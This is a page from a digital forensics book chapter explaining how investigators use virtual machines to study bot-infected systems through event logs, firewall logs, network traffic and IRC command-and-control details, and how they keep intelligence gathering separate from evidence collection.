244 Chapter9·ForensicAnalysis environment that will interpret the contents of index.dat files to reveal Internet access history and cookies even if the user has deleted the history and cache. Collecting Intelligence about Botnets or Virus-Infected Systems Using virtualization to execute the code on a suspected bot client or virus-infected system permits the investigator to gather valuable insights about the workings of malicious code. From the security event log you can see any attempts to guess passwords using brute force. You also find the identity of other bot clients that are involved in the brute force attacks. Using the firewall logs you see any inbound-opens that have been attempted. You can learn the identity of websites that delivered malicious code by looking at the firewall logs around the time of the malware detection. Watching network traffic from the suspect computer, you can identify ports opened by malicious code and the ip addresses of other parts of the botnet. These other parts of the botnet may be providing malicious code, such as retroviruses, to kill off your anti-virus protection, or lists of email addresses and spam templates. If the bot client uses Internet Relay Chat (IRC) you may find the Command and Control server, nick, userid, and password.You can then use this information to detect other infected computers in your organization and prevent future communications with the mother ship. Locating the actual malware is a primary goal of a forensic examination of a bot client or virus-infected computer. Chapter 6, "Malware Analysis," describes the process of running code samples in a sandbox to perform malware analysis. Collecting Intelligence about a Case When investigators gather evidence, they must ensure that no unexplained changes occur to the suspect's computer. If the goal of the examination is to gather intelligence rather than evidence, the VM can be used without restraint. The investigator must take pains to ensure that information gathered during an intelligence gathering run does not mix with information gathered as evidence. In these circumstances the investigator can use institution and even hearsay to suggest keywords for searches or other settings in the suspect's computer, using the VM to check out "what if?" scenarios. The intelligence may then suggest a set of information that can be gathered in a traditional manner that may be used as evidence.